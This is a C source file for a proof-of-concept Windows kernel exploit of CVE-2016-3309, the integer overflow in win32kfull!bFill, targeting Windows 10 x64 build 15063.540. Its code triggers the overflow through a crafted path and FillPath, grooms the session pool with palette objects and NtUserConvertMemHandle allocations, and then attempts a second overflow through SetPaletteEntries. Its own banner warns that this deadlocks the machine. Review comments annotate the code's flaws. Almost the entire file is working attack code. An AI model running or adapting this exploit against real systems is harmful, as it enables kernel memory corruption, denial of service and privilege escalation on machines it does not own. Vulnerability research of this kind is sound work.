#include <Windows.h>
#include <stdio.h>

/*
0: kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
dtx is unsupported for this scenario.  It only recognizes dtx [<type>] [<address>] with -a, -h, and -r.  Reverting to dt.
+0x2e0 UniqueProcessId     : Ptr64 Void
+0x2e8 ActiveProcessLinks  :
+0x000 Flink               : Ptr64 _LIST_ENTRY
+0x008 Blink               : Ptr64 _LIST_ENTRY
+0x358 Token               : _EX_FAST_REF
*/
/*
Build-specific constants used by this program.
The first three members are byte offsets of fields inside ntdll!_EPROCESS
(see the debugger output above); the last one is an offset relative to the
base of the nt kernel image. All values depend on the exact Windows build.
*/
typedef struct
{
	DWORD UniqueProcessIdOffset;     // offset of _EPROCESS.UniqueProcessId
	DWORD ActiveProcessLinksOffset;  // offset of _EPROCESS.ActiveProcessLinks (a _LIST_ENTRY: Flink/Blink)
	DWORD TokenOffset;               // offset of _EPROCESS.Token (an _EX_FAST_REF)

	/*
	nt!EmpCheckErrataList is not exported, so its offset from the image base
	has to be looked up in a kernel debugger, e.g.:
	0: kd> ? nt!EmpCheckErrataList - nt
	Evaluate expression: 1284192 = 00000000`00139860
	*/
	DWORD nt_EmpCheckErrataList_offset;
} VersionSpecificConfig;

// Offsets in member order: UniqueProcessId, ActiveProcessLinks, Token, nt!EmpCheckErrataList - nt.
VersionSpecificConfig gConfig = { 0x2e0, 0x2e8, 0x358, 0x139860, }; // win10 x64, build 15063.540

// NOTE(review): none of the globals in this group (gConfig included) is referenced
// in the visible part of this file - presumably leftovers from a fuller variant of
// the program; confirm before removing.
// NOTE(review): `bool` is used without <stdbool.h>, so this file only builds as C++
// (or as C23).
bool go = false;
HPALETTE pwnd_palette = 0;
HPALETTE manager_palette = 0;
HPALETTE worker_palette = 0;
BYTE* manager_bits = 0;

/*
One group of four palette handles. main() allocates an array of these and fills
every element via createPaletteofSize(): dummy_palette with palette_size, the
other three with 0xfe0 each.
*/
typedef struct target_objs_ {
	HPALETTE dummy_palette;    // created with size palette_size
	HPALETTE pwnd_palette;     // created with size 0xfe0; later passed to SetPaletteEntries
	HPALETTE manager_palette;  // created with size 0xfe0
	HPALETTE worker_palette;   // created with size 0xfe0
}target_objs;

typedef HANDLE(WINAPI* ZwUserConvertMemHandle)(BYTE* buf, DWORD size);

// Cached address of NtUserConvertMemHandle; resolved on the first call to AllocateOnSessionPool().
ZwUserConvertMemHandle pfnUserConvertMemHandle = 0;

/*
Calls NtUserConvertMemHandle with a buffer of (size - 0x14) bytes filled with 0x41.

Per the original author's notes, win32kfull!ConvertMemHandle adds 0x14 to the
requested length (lea r9d, [rdi+14h]) before the value is passed to HMAllocObject,
and the resulting pool buffer is preceded by a 0x10-byte header; subtracting 0x14
here is meant to make the pool allocation `size` bytes plus that header.

size:    desired allocation size; must be at least 0x14.
returns: the GlobalAlloc handle that backs the user-mode source buffer (NOT the
         handle returned by NtUserConvertMemHandle, which is discarded), or
         INVALID_HANDLE_VALUE on any failure. The caller owns the returned
         HGLOBAL and may release it with GlobalFree.
*/
HANDLE AllocateOnSessionPool(unsigned int size) {
	if (!pfnUserConvertMemHandle) {
		// win32u.dll is tried first; on win8.1 this function is located in user32.dll
		const char* modules[] = { "win32u.dll", "user32.dll" };
		for (int i = 0; i < 2 && !pfnUserConvertMemHandle; i++) {
			// LoadLibraryA: the names are narrow literals, so this also builds with UNICODE defined
			HMODULE hModule = LoadLibraryA(modules[i]);
			if (hModule) {
				pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(hModule, "NtUserConvertMemHandle");
			}
		}
		if (!pfnUserConvertMemHandle) {
			printf("could not find win32u!NtUserConvertMemHandle. exiting.\n");
			return INVALID_HANDLE_VALUE;
		}
		//printf("pfnUserConvertMemHandle @ 0x%llx\n", (UINT64)pfnUserConvertMemHandle);
	}

	// size - 0x14 would wrap for smaller values and lead to a write through NULL/out of bounds
	if (size < 0x14) {
		printf("bad size! can't allocate less than 0x14 bytes!\n");
		return INVALID_HANDLE_VALUE;
	}
	DWORD alloc_size = size - 0x14;

	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, size);
	if (!hMem) {
		printf("GlobalAlloc() failed: %lx\n", GetLastError());
		return INVALID_HANDLE_VALUE;
	}
	BYTE* buf = (BYTE*)GlobalLock(hMem);
	if (!buf) {
		printf("GlobalLock() failed: %lx\n", GetLastError());
		GlobalFree(hMem);
		return INVALID_HANDLE_VALUE;
	}

	// fill the source buffer in place; no intermediate heap copy is needed
	memset(buf, 0x41, alloc_size);
	pfnUserConvertMemHandle(buf, alloc_size);
	GlobalUnlock(hMem);
	return hMem;
}

/*
Creates a logical palette whose entry count is derived from a target size:
entries = (size - 0x90) / 4. According to the original author the intent is a
palette object of `size` bytes on the paged session pool; 0x90 is presumably the
size of the kernel palette header on the targeted build (TODO confirm), 4 is
sizeof(PALETTEENTRY).

Every byte of the temporary LOGPALETTE (and therefore of every entry) is set to
0x04 before palVersion/palNumEntries are filled in.

size:    target size; must be > 0x90 and yield between 1 and 0xFFFF entries.
returns: the palette handle from CreatePalette, or 0 on bad size / failure.
*/
HPALETTE createPaletteofSize(int size) {
	// we alloc a palette which will have the specific size on the paged session pool.
	if (size <= 0x90) {
		printf("bad size! can't allocate palette of size < 0x90!\n");
		return 0;
	}
	int pal_cnt = (size - 0x90) / 4;
	// palNumEntries is a WORD: reject counts that would be truncated, and 0 entries
	if (pal_cnt < 1 || pal_cnt > 0xFFFF) {
		printf("bad size! palette entry count 0x%x is out of range!\n", pal_cnt);
		return 0;
	}

	// LOGPALETTE already contains one PALETTEENTRY, hence pal_cnt - 1
	size_t palsize = sizeof(LOGPALETTE) + ((size_t)pal_cnt - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
	if (!lPalette) {
		printf("out of memory while building palette of size 0x%x!\n", size);
		return 0;
	}
	memset(lPalette, 0x4, palsize);
	lPalette->palNumEntries = (WORD)pal_cnt;
	lPalette->palVersion = 0x300;

	HPALETTE hPalette = CreatePalette(lPalette);
	// the LOGPALETTE is only an input description; release it once the palette exists
	free(lPalette);
	return hPalette;
}

/*
Proof-of-concept entry point; argc/argv are unused.

According to its own banner the program targets Windows 10 x64 RS2
(build 15063.540) and continuing past the initial getchar() is expected to
deadlock the machine.

Visible sequence:
  1. create a memory DC and select a 0x666 x 0x1338, 32 bpp bitmap into it
  2. compute chunksize / palette_size from the factor pair (sizeA, sizeB)
  3. build a path: BeginPath, sizeA calls of PolylineTo with sizeB points, EndPath
  4. raise process/thread priority and perform the allocation sequence
     (AllocateOnSessionPool / createPaletteofSize)
  5. call FillPath, restore normal priority
  6. call SetPaletteEntries on every pwnd_palette, last element first

None of the resources acquired here is released before returning.

NOTE(review): `void main` is non-standard; the return statements carry no exit code.
*/
void main(int argc, char* argv[]) {

	printf("[+] win32kfull!bFill (aka. CVE-2016-3309) reloaded, @bitshifter123, siberas, 10/2017\n");
	printf("[+] target: Windows 10 x64 RS2 (build 15063.540)\n");
	printf("[+] DEADLOCK-EXAMPLE: CONTINUING FROM HERE WILL DEADLOCK YOUR MACHINE!\n");
	// wait for a key press so the user can still abort
	getchar();

	// memory DC compatible with the screen DC, with a bitmap selected into it
	// NOTE(review): bitobj (the previously selected object) is never used afterwards
	HDC hdc = GetDC(NULL);
	HDC hMemDC = CreateCompatibleDC(hdc);
	HGDIOBJ bitmap = CreateBitmap(0x666, 0x1338, 1, 32, NULL);
	HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
	
	// source entries for the SetPaletteEntries calls at the end: 0x1000 entries, every byte 0x04
	// NOTE(review): calloc's zero-fill is immediately overwritten by memset; the result is not NULL-checked
	int read_palettes_count = 0x1000;
	PALETTEENTRY *rPalette = (PALETTEENTRY*)calloc(read_palettes_count, sizeof(PALETTEENTRY));
	memset(rPalette, 0x04, read_palettes_count * sizeof(PALETTEENTRY));

	/*
	Precomputed factor pairs. Each row reads:
	<truncated 32-bit result>: <factorA>*<factorB> = <product> => (<product> + 1) * 0x30 = <result>

	// offset +0
	0x30: 0x10000 * 0x10000 = 0x10000000 => 0x10000001 * 0x30 = (int32)0x30
	0x60: 0x11 * 0xf0f0f1 = 0x10000001 => 0x10000002 * 0x30 = (int32)0x60
	0x90: 0xc06*0x154ab = 0x10000002 => 0x10000003 * 0x30 = (int32)0x90

	// offset +10
	0x10: 0xccd*0xd552	= 0xaaaaaaa => 0xaaaaaab *0x30 = 0x200000010 = (int32)0x10 => alloc of 0x20
	0x40: 0x3b*0x2e4851	= 0xaaaaaab => 0xaaaaaac *0x30 = 0x200000040 = (int32)0x40 => alloc of 0x50
	0x70: 0x804*0x154ab	= 0xaaaaaac => 0xaaaaaad *0x30 = 0x200000070 = (int32)0x70 => alloc of 0x80
	0xa0: 0x1769*0x74a5	= 0xaaaaaad => 0xaaaaaae *0x30 = 0x2000000a0 = (int32)0xa0 => alloc of 0xb0

	// offset +20
	0x20: 0x27b*0x2266f = 0x5555555 => 0x5555556 * 0x30 = (int32)0x20 => alloc of 0x30 bytes
	0x50: 0x156*0x3FE01 = 0x5555556 => 0x5555557 * 0x30 = (int32)0x50 => alloc of 0x60 bytes
	0x80: 0xa1*0x87af7	= 0x5555557 => 0x5555558 * 0x30 = (int32)0x80 => alloc of 0x90 bytes
	0xb0: 0xfd3*0x5648	= 0x5555558 => 0x5555559 * 0x30 = (int32)0xb0 => alloc of 0xc0 bytes
	0xe0: 0x13369*0x471	= 0x5555559 => 0x555555a * 0x30 = (int32)0xe0 => alloc of 0xf0 bytes
	*/
	// the "0xa0" row of the table above is the one in use
	int sizeA = 0x1769;
	int sizeB = 0x74a5;
	// both sizes are WITHOUT header, i.e. if they should add up to 0x1000
	// we need for example chunksize 0xf40 and palette_size 0xa0. 0xf40 + 0x10 + 0xa0 + 0x10 == 0x1000
	// (with the pair selected above the values are chunksize 0xa0 and palette_size 0xf40)
	// NOTE(review): the chunksize expression is evaluated in signed int and overflows
	// (0xaaaaaae * 0x30 does not fit in 32 bits), which is undefined behavior; the code
	// relies on wrap-around. real_size is the same expression evaluated in 64 bits.
	DWORD chunksize = (DWORD)(((sizeA * sizeB) + 1) * 0x30);
	UINT64 real_size = (((UINT64)sizeA * (UINT64)sizeB) + 1) * 0x30;
	int palette_size = 0x1000 - 0x10 - chunksize - 0x10;
	//printf("[+] sizeA 0x%x\n", sizeA);
	//printf("[+] sizeB 0x%x\n", sizeB);
	printf("[+] prepare int overflow: ((0x%x * 0x%x) + 1) * 0x30 == 0x%llx == (int32) 0x%x\n", sizeA, sizeB, real_size, chunksize);
	//printf("[+] chunksize == 0x%x => palette_size == 0x%x\n", chunksize, palette_size);
	printf("[+] header + chunksize + header + palette_size = 0x%x + 0x10 + 0x%x + 0x10 = 0x%x\n", chunksize, palette_size, chunksize + 0x10 + palette_size + 0x10);

	// sanity check of the computed sizes
	// NOTE(review): the third condition can never be true - palette_size is defined as
	// 0x1000 - 0x20 - chunksize and the sum is evaluated in unsigned 32-bit arithmetic.
	// A negative palette_size (chunksize between 0xfe1 and 0x1000) passes this check and
	// is only rejected later by createPaletteofSize().
	if (chunksize > 0x1000 ||
		palette_size > 0x1000 ||
		palette_size + chunksize + 0x20 != 0x1000) {
		printf("[-] bad sizes!? exiting!\n");
		return;
	}

	// sizeB points, all initialised to (point_value, point_value)
	// NOTE(review): malloc result is not NULL-checked
	POINT* points = (POINT*)malloc(sizeB * sizeof(POINT));
	DWORD point_value = 0x66000000;
	for (int x = 0; x < sizeB; x++) {
		points[x].x = point_value;
		points[x].y = point_value;
	}

	printf("[BUG 1/4] BeginPath\n");
	if (!BeginPath(hMemDC)) {
		printf("[-] BeginPath() Failed: %x\n", GetLastError());
		return;
	}

	// add sizeA polylines of sizeB points each to the path; only the first
	// polyline carries the special values in points[1] and points[2]
	printf("[BUG 2/4] PolylineTo\n");
	for (int j = 0; j < sizeA; j++) {
		if (j == 0)
		{
			points[1].x = 0x11223344;
			points[1].y = 0x360;
			//points[2].x = 1; // overwrite hHmgr with 1
			points[2].x = 0x11223344; // overwrite hHmgr with 0
			points[2].y = 0x400;
		}
		else
		{
			// restore the default values for all remaining polylines
			points[1].x = point_value;
			points[1].y = point_value;
			points[2].x = point_value;
			points[2].y = point_value;
		}

		if (!PolylineTo(hMemDC, points, sizeB)) {
			printf("[-] PolylineTo() Failed: %x\n", GetLastError());
			return;
		}
	}

	// NOTE(review): unlike BeginPath/PolylineTo, the result of EndPath is not checked
	printf("[BUG 3/4] EndPath\n");
	EndPath(hMemDC);

	printf("[+] now perform pool feng shui...\n");

	// run the allocation sequence at the highest priority; reverted after FillPath
	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);


	// defragment on page level: we will cause 0xfe0 + 0x10 = 0xff0-sized buffers, filling one pool page each
	// (return values of AllocateOnSessionPool are ignored here and below)
	for (int i = 0; i < 0x400; i++) {
		AllocateOnSessionPool(0xfe0);
	}

	// defragment with chunksize - we will create buffers on the pool of size chunksize + 0x10
	for (int i = 0; i < 0x5000; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// 0x800 groups of four palettes each (see target_objs)
	// NOTE(review): calloc result is not NULL-checked
	int create_objs_count = 0x800;
	target_objs* targets_objects = (target_objs*)calloc(create_objs_count, sizeof(target_objs));

	for (int i = 0; i < create_objs_count; i++) {
		targets_objects[i].dummy_palette = createPaletteofSize(palette_size);
		targets_objects[i].pwnd_palette = createPaletteofSize(0xfe0);   // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].manager_palette = createPaletteofSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].worker_palette = createPaletteofSize(0xfe0);  // -> pool will be 0xff0 alloc'ed / 0x10 free
	}

	// now trigger some more chunksize allocations to fill the holes
	for (int i = 0; i < create_objs_count / 2; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// finally, trigger bug in FillPath!
	FillPath(hMemDC);

	// back to normal scheduling
	SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

	printf("[BUG 4/4] hit trigger in FillPath!\n");
	printf("[!] trigger 2nd overflow via SetPaletteEntries - main thread will deadlock now\n");
	printf("[!] as soon as you do a right click somewhere, start a new program or just wait a bit your machine will deadlock, too! :P\n");
	Sleep(100);
			
	// walk the groups from last to first; each call asks for 0x1000 entries starting
	// at index 0, while createPaletteofSize(0xfe0) built the palette with
	// (0xfe0 - 0x90) / 4 = 0x3d4 entries
	for (int i = create_objs_count - 1; i >= 0; i--) {		
		// attempt overflow from pwnd_palette into manager_palette
		// we'll deadlock the machine in one of the SetPaletteEntries calls
		SetPaletteEntries(targets_objects[i].pwnd_palette, 0, 0x1000, rPalette);
	}
}
